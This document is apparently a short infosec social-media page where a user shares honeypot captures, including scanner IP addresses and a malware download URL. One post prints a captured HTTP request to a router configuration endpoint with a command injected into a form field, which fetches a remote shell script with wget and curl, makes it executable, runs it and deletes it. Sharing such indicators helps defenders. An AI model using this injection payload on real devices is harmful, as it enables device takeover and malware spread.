My honeypots caughts 111 different payloads in the last 24h from the scanners 45.153.34[.]219 and
45.153.34[.]231 trying to trigger the script and malware from hXXp://91.92.40.118/wget.sh
#malware
Remote
xuf
@xuf@infosec.exchange
65 Followers
500 Following
2 Posts
Joined November 04, 2022
Open post
Fresh from a honeypot:
POST/goform/set_LimitClient_cfg 8080 post_input time1=00:00-00:00&time2=00:00-00:00&mac=;wget 41.216.189[.]157/nz.sh; curl -O 41.216.189[.]157/nz.sh; chmod 777 nz.sh; sh nz.sh; rm -rf nz.sh; rm -rf nz.sh*"
http://41.216.189.157/
# malware #opendir
1
0
0
0